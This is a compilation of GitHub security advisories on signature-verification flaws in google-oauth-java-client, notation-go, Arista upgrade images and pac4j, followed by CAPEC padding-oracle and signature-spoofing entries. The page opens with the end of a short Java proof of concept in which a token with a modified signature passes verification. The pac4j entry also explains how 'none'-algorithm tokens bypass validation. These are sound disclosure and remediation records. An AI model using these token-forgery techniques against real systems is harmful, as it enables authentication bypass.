+\n\"FyY06b6Odgd7xXLsSTiiSnch62dl0Lfi9D0x2ByxvsGOCbovmBl2ZZ0zHr1wpc4N0XS9lMUq5RJ\" + \n\"QbonDibxXG4nC2zroDfvD0h7i-L8KMXeJb9pYwW7LkmrM_YwYfJnWnZ4bpcsDjojmPeUBlACg7tjjOgBFby\" +\n\"QZvUtaERJwSRlaWibvNjof7eCVfZChE0PwBpZc_cGqSqKXv544L4ttqdCnm0NjqrTATXwC4gYx\" + \n\"ruevkjHfYI5ojcQmXoWDJJ0-_jzfyPE4MFFdCFgzLgnfIOwe5ve0MtquKuv2O0pgvg\";\n\nIdTokenVerifier tokenVerifier =\n new IdTokenVerifier.Builder()\n .setClock(clock)\n .setCertificatesLocation(\"https://www.googleapis.com/robot/v1/metadata/x509/integration-tests%40chingor-test.iam.gserviceaccount.com\")\n .setHttpTransportFactory(new DefaultHttpTransportFactory())\n .build();\n\n// verification will return true despite modified signature for versions \u003c1.33.3\ntokenVerifier.verify(IdToken.parse(GsonFactory.getDefaultInstance(), SERVICE_ACCOUNT_RS256_TOKEN_BAD_SIGNATURE));\n\n```\n\n### Remediation and Mitigation\nUpdate to the version 1.33.3 or higher \n\nIf the library used indirectly or cannot be updated for any reason you can use similar IdToken verifiers provided by Google that already has signature verification. For example: \n[google-auth-library-java](https://github.com/googleapis/google-auth-library-java/blob/main/oauth2_http/java/com/google/auth/oauth2/TokenVerifier.java)\n[google-api-java-client](https://github.com/googleapis/google-api-java-client/blob/main/google-api-client/src/main/java/com/google/api/client/googleapis/auth/oauth2/GoogleIdTokenVerifier.java)\n\n###Timeline\nDate reported: 12 Dec 2021\nDate fixed: 13 Apr 2022\nDate disclosed: 2 May 2022\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in the [google-oauth-java-client](https://github.com/googleapis/google-oauth-java-client) repo",
"id": "GHSA-xh97-72ww-2w58",
"modified": "2024-04-09T15:11:14Z",
"published": "2022-05-04T00:00:22Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/googleapis/google-oauth-java-client/security/advisories/GHSA-hw42-3568-wj87"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-22573"
},
{
"type": "WEB",
"url": "https://github.com/googleapis/google-oauth-java-client/pull/872"
},
{
"type": "PACKAGE",
"url": "https://github.com/googleapis/google-oauth-java-client"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Duplicate Advisory: Improper Verification of Cryptographic Signature in google-oauth-java-client",
"withdrawn": "2024-04-09T15:11:14Z"
}
GHSA-XHG5-42RF-296R
Vulnerability from github – Published: 2023-06-06 16:45 – Updated: 2023-06-16 17:53Impact
An attacker who controls or compromises a registry can lead a user to verify the wrong artifact.
Patches
The problem has been fixed in the release v1.0.0-rc.6. Users should upgrade their notation-go library to v1.0.0-rc.6 or above.
Workarounds
User should use secure and trusted container registries.
Credits
The notation project would like to thank Adam Korczynski (@AdamKorcz) for responsibly disclosing the issue found during an security audit (facilitated by OSTIF and sponsored by CNCF) and Shiwei Zhang (@shizhMSFT), Pritesh Bandi (@priteshbandi) for root cause analysis.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/notaryproject/notation-go"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.0.0-rc.6"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2023-33959"
],
"database_specific": {
"cwe_ids": [
"CWE-347"
],
"github_reviewed": true,
"github_reviewed_at": "2023-06-06T16:45:29Z",
"nvd_published_at": "2023-06-06T19:15:12Z",
"severity": "HIGH"
},
"details": "### Impact\nAn attacker who controls or compromises a registry can lead a user to verify the wrong artifact.\n\n### Patches\nThe problem has been fixed in the release [v1.0.0-rc.6](https://github.com/notaryproject/notation-go/releases/tag/v1.0.0-rc.6). Users should upgrade their notation-go library to [v1.0.0-rc.6](https://github.com/notaryproject/notation-go/releases/tag/v1.0.0-rc.6) or above.\n\n### Workarounds\nUser should use secure and trusted container registries.\n\n### Credits\nThe `notation` project would like to thank Adam Korczynski (@AdamKorcz) for responsibly disclosing the issue found during an security audit (facilitated by OSTIF and sponsored by CNCF) and Shiwei Zhang (@shizhMSFT), Pritesh Bandi (@priteshbandi) for root cause analysis.\n",
"id": "GHSA-xhg5-42rf-296r",
"modified": "2023-06-16T17:53:30Z",
"published": "2023-06-06T16:45:29Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/notaryproject/notation-go/security/advisories/GHSA-xhg5-42rf-296r"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-33959"
},
{
"type": "WEB",
"url": "https://github.com/notaryproject/notation-go/commit/39c8ed050a65cca3f3f308534acb612096735a64"
},
{
"type": "WEB",
"url": "https://github.com/notaryproject/notation-go/commit/eba60f5aed9c9e05dee55324423c95fe34700b4c"
},
{
"type": "PACKAGE",
"url": "https://github.com/notaryproject/notation-go"
},
{
"type": "WEB",
"url": "https://github.com/notaryproject/notation-go/releases/tag/v1.0.0-rc.6"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "notation-go\u0027s verification bypass can cause users to verify the wrong artifact"
}
GHSA-XHHH-442H-J6WM
Vulnerability from github – Published: 2025-10-30 00:31 – Updated: 2025-10-30 00:31Cryptographic validation of upgrade images could be circumventing by dropping a specifically crafted file into the upgrade ISO
{
"affected": [],
"aliases": [
"CVE-2025-54549"
],
"database_specific": {
"cwe_ids": [
"CWE-347"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-10-29T23:16:19Z",
"severity": "MODERATE"
},
"details": "Cryptographic validation of upgrade images could be circumventing by dropping a specifically crafted file into the upgrade ISO",
"id": "GHSA-xhhh-442h-j6wm",
"modified": "2025-10-30T00:31:02Z",
"published": "2025-10-30T00:31:02Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54549"
},
{
"type": "WEB",
"url": "https://www.arista.com/en/support/advisories-notices/security-advisory/22538-security-advisory-0124"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:N/I:H/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-XHW6-HJC9-679M
Vulnerability from github – Published: 2022-01-08 00:36 – Updated: 2023-09-26 17:27If an OpenID Connect provider supports the “none” algorithm (i.e., tokens with no signature), pac4j v5.3.0 (and prior) does not refuse it without an explicit configuration on its side or for the “idtoken” response type which is not secure and violates the OpenID Core Specification. The "none" algorithm does not require any signature verification when validating the ID tokens, which allows the attacker to bypass the token validation by injecting a malformed ID token using "none" as the value of "alg" key in the header with an empty signature value.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.pac4j:pac4j-oidc"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.5.5"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.pac4j:pac4j-oidc"
},
"ranges": [
{
"events": [
{
"introduced": "5.0"
},
{
"fixed": "5.3.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2021-44878"
],
"database_specific": {
"cwe_ids": [
"CWE-347"
],
"github_reviewed": true,
"github_reviewed_at": "2022-01-07T22:41:34Z",
"nvd_published_at": "2022-01-06T13:15:00Z",
"severity": "HIGH"
},
"details": "If an OpenID Connect provider supports the \u201cnone\u201d algorithm (i.e., tokens with no signature), pac4j v5.3.0 (and prior) does not refuse it without an explicit configuration on its side or for the \u201cidtoken\u201d response type which is not secure and violates the OpenID Core Specification. The \"none\" algorithm does not require any signature verification when validating the ID tokens, which allows the attacker to bypass the token validation by injecting a malformed ID token using \"none\" as the value of \"alg\" key in the header with an empty signature value.",
"id": "GHSA-xhw6-hjc9-679m",
"modified": "2023-09-26T17:27:45Z",
"published": "2022-01-08T00:36:05Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44878"
},
{
"type": "WEB",
"url": "https://github.com/pac4j/pac4j/commit/09684e0de1c4753d22c53b8135d4ef61cfda76f7"
},
{
"type": "WEB",
"url": "https://github.com/pac4j/pac4j/commit/22b82ffd702a132d9f09da60362fc6264fc281ae"
},
{
"type": "WEB",
"url": "https://github.com/pac4j/pac4j/commit/9c87bbc536ed5d05f940ae015403120df2935589"
},
{
"type": "PACKAGE",
"url": "https://github.com/pac4j/pac4j"
},
{
"type": "WEB",
"url": "https://openid.net/specs/openid-connect-core-1_0.html#IDToken"
},
{
"type": "WEB",
"url": "https://www.pac4j.org/4.5.x/docs/release-notes.html"
},
{
"type": "WEB",
"url": "https://www.pac4j.org/blog/cve_2021_44878_is_this_serious.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Pac4j token validation bypass if OpenID Connect provider supports none algorithm"
}
No mitigation information available for this CWE.
CAPEC-463: Padding Oracle Crypto Attack
An adversary is able to efficiently decrypt data without knowing the decryption key if a target system leaks data on whether or not a padding error happened while decrypting the ciphertext. A target system that leaks this type of information becomes the padding oracle and an adversary is able to make use of that oracle to efficiently decrypt data without knowing the decryption key by issuing on average 128*b calls to the padding oracle (where b is the number of bytes in the ciphertext block). In addition to performing decryption, an adversary is also able to produce valid ciphertexts (i.e., perform encryption) by using the padding oracle, all without knowing the encryption key.
CAPEC-475: Signature Spoofing by Improper Validation
An adversary exploits a cryptographic weakness in the signature verification algorithm implementation to generate a valid signature without knowing the key.